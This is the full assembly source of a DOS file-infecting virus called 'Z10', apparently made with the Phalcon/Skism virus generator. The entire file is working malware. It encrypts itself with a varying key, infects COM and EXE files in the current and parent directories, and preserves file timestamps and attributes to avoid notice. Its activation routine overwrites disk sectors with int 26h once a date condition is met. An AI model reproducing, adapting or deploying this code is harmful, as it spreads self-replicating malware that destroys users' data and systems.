; Z10.asm : [Z10] by Paul Ferguson ; Created wik the Phalcon/Skism Mass-Produced Code Generator ; from the configuration file skeleton.cfg .model tiny ; Handy directive .code ; Virus code segment org 100h ; COM file starting IP id = 'ZA' ; ID word for EXE infections entry_point: db 0e9h,0,0 ; jmp decrypt decrypt: ; handles encryption and decryption patch_startencrypt: mov si,offset startencrypt ; start of decryption mov di,(offset heap - offset startencrypt)/2 ; iterations decrypt_loop: db 2eh,81h,04h ; add word ptr cs:[si], xxxx decrypt_value dw 0 ; initialised at zero for null effect inc si ; calculate new decryption location inc si dec di ; If we are not done, then jnz decrypt_loop ; decrypt mo' startencrypt: call next ; calculate delta offset next: pop bp ; bp = IP next sub bp,offset next ; bp = delta offset cmp sp,id ; COM or EXE? je restoreEXE restoreCOM: lea si,[bp+save3] mov di,100h push di ; For later return movsb jmp short restoreEXIT restoreEXE: push ds push es push cs ; DS = CS pop ds push cs ; ES = CS pop es lea si,[bp+jmpsave2] lea di,[bp+jmpsave] movsw movsw movsw restoreEXIT: movsw mov byte ptr [bp+numinfec],2 ; reset infection counter mov ah,1Ah ; Set new DTA lea dx,[bp+newDTA] ; new DTA @ DS:DX int 21h mov ah,47h ; Get current directory mov dl,0 ; Current drive lea si,[bp+origdir] ; DS:SI->buffer int 21h mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR mov ax,3524h ; Get int 24 handler int 21h ; to ES:BX mov word ptr [bp+oldint24],bx; Save it mov word ptr [bp+oldint24+2],es mov ah,25h ; Set new int 24 handler lea dx,[bp+offset int24] ; DS:DX->new handler int 21h push cs ; Restore ES pop es ; 'cuz it was changed dir_scan: ; "dot dot" traversal lea dx,[bp+exe_mask] call infect_mask lea dx,[bp+com_mask] call infect_mask mov ah,3bh ; change directory lea dx,[bp+dot_dot] ; "cd .." int 21h jnc dir_scan ; go back for mo! done_infections: mov ah,2ah ; Get current date int 21h cmp dh,10 ; Check month jb exit_virus cmp dl,30 ; Check date jb exit_virus cmp cx,1991 ; Check year jb exit_virus cmp al,0 ; Check date of week jb exit_virus mov ah,2ch ; Get current time int 21h cmp dl,50 ; Check the percentage jbe activate exit_virus: mov ax,2524h ; Restore int 24 handler lds dx,[bp+offset oldint24] ; to original int 21h push cs pop ds mov ah,3bh ; change directory lea dx,[bp+origdir-1] ; original directory int 21h mov ah,1ah ; restore DTA to default mov dx,80h ; DTA in PSP cmp sp,id-4 ; EXE or COM? jz returnEXE returnCOM: int 21h retn ; 100h is on stack returnEXE: pop es pop ds int 21h mov ax,es ; AX = PSP segment add ax,10h ; Adjust for PSP add word ptr cs:[bp+jmpsave+2],ax add ax,word ptr cs:[bp+stacksave+2] cli ; Clear intrpts for stack manipulation mov sp,word ptr cs:[bp+stacksave] mov ss,ax sti db 0eah ; jmp ssss:oooo jmpsave dd ? ; Original CS:IP stacksave dd ? ; Original SS:SP jmpsave2 db ? ; Actually four bytes save3 db 0cdh,20h,0 ; First 3 bytes of COM file stacksave2 dd ? activate: ; Conditions satisfied mov al,0002h ; First argument is 2 mov cx,0080h ; Second argument is 16 cli ; Disable interrupts (no Ctrl-C) cwd ; Clear DX (start with sector 0) int 026h ; Remove the semi-colon sti ; Restore interrupts mov ax,04C00h ; DOS terminate function int 021h jmp exit_virus creator db '[PF]',0 ; Mass Produced Code Generator virusname db '[Z10]',0 author db 'Paul Ferguson',0 infect_mask: mov ah,4eh ; find first file mov cx,7 ; any attribute findfirstnext: int 21h ; DS:DX points to mask jc exit_infect_mask ; No mo files found mov al,0h ; Open read only call open mov ah,3fh ; Read file to buffer lea dx,[bp+buffer] ; @ DS:DX mov cx,1Ah ; 1Ah bytes int 21h mov ah,3eh ; Close file int 21h cmp word ptr [bp+buffer],'ZM'; EXE? jz checkEXE ; Why yes, yes it is! checkCOM: mov ax,word ptr [bp+newDTA+35] ; Get tail of filename cmp ax,'DN' ; Ends in ND? (commaND) jz find_next mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA cmp ax,13000 ; Is it too small? jb find_next cmp ax,65535-(endheap-decrypt) ; Is it too large? ja find_next mov bx,word ptr [bp+buffer+1]; get jmp location add bx,heap-decrypt+3 ; Adjust for virus size cmp ax,bx je find_next ; already infected jmp infect_com checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? jnz infect_exe find_next: mov ah,4fh ; find next file jmp short findfirstnext exit_infect_mask: ret infect_exe: les ax, dword ptr [bp+buffer+14h] ; Save old entry point mov word ptr [bp+jmpsave2], ax mov word ptr [bp+jmpsave2+2], es les ax, dword ptr [bp+buffer+0Eh] ; Save old stack mov word ptr [bp+stacksave2], es mov word ptr [bp+stacksave2+2], ax mov ax, word ptr [bp+buffer + 8] ; Get header size mov cl, 4 ; convert to bytes shl ax, cl xchg ax, bx les ax, [bp+offset newDTA+26]; Get file size mov dx, es ; to DX:AX push ax push dx sub ax, bx ; Subtract header size from sbb dx, 0 ; file size mov cx, 10h ; Convert to segment:offset div cx ; form mov word ptr [bp+buffer+14h], dx ; New entry point mov word ptr [bp+buffer+16h], ax mov word ptr [bp+buffer+0Eh], ax ; and stack mov word ptr [bp+buffer+10h], id pop dx ; get file length pop ax add ax, heap-decrypt ; add virus size adc dx, 0 mov cl, 9 push ax shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 1 ; mod 512 mov word ptr [bp+buffer+4], dx ; new file size mov word ptr [bp+buffer+2], ax push cs ; restore ES pop es push word ptr [bp+buffer+14h] ; needed later mov cx, 1ah jmp short finishinfection infect_com: ; ax = filesize mov cx,3 sub ax,cx lea si,[bp+offset buffer] lea di,[bp+offset save3] movsw movsb mov byte ptr [si-3],0e9h mov word ptr [si-2],ax add ax,103h push ax ; needed later finishinfection: push cx ; Save # bytes to write xor cx,cx ; Clear attributes call attributes ; Set file attributes mov al,2 call open mov ah,40h ; Write to file lea dx,[bp+buffer] ; Write from buffer pop cx ; cx bytes int 21h mov ax,4202h ; Move file pointer xor cx,cx ; to end of file cwd ; xor dx,dx int 21h mov ah,2ch ; Get current time int 21h ; dh=sec,dl=1/100 sec mov [bp+decrypt_value],dx ; Set new encryption value lea di,[bp+code_store] mov ax,5355h ; push bp,push bx stosw lea si,[bp+decrypt] ; Copy encryption function mov cx,startencrypt-decrypt ; Bytes to move push si ; Save for later use push cx rep movsb xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub lea si,[bp+write] ; Copy writing function mov cx,endwrite-write ; Bytes to move rep movsb pop cx pop si pop dx ; Entry point of virus push di push si push cx rep movsb ; Copy decryption function mov ax,5b5dh ; pop bx,pop bp stosw mov al,0c3h ; retn stosb add dx,offset startencrypt - offset decrypt ; Calculate new mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of call code_store ; decryption pop cx pop di pop si rep movsb ; Restore decryption function mov ax,5701h ; Restore creation date/time mov cx,word ptr [bp+newDTA+16h] ; time mov dx,word ptr [bp+newDTA+18h] ; date int 21h mov ah,3eh ; Close file int 21h mov ch,0 mov cl,byte ptr [bp+newDTA+15h] ; Restore original call attributes ; attributes dec byte ptr [bp+numinfec] ; One mo infection jnz mo_infections ; Not enough pop ax ; remove call from stack jmp done_infections mo_infections: jmp find_next open: mov ah,3dh lea dx,[bp+newDTA+30] ; filename in DTA int 21h xchg ax,bx ret attributes: mov ax,4301h ; Set attributes to cx lea dx,[bp+newDTA+30] ; filename in DTA int 21h ret write: pop bx ; Restore file handle pop bp ; Restore relativeness mov ah,40h ; Write to file lea dx,[bp+decrypt] ; Concatenate virus mov cx,heap-decrypt ; # bytes to write int 21h push bx push bp endwrite: int24: ; New int 24h (error) handler mov al,3 ; Fail call iret ; Return control exe_mask db '*.exe',0 com_mask db '*.com',0 dot_dot db '..',0 heap: ; Variables not in code code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) oldint24 dd ? ; Storage for old int 24h handler backslash db ? origdir db 64 dup (?) ; Current directory buffer newDTA db 43 dup (?) ; Temporary DTA numinfec db ? ; Infections this run buffer db 1ah dup (?) ; read buffer endheap: ; End of virus end entry_point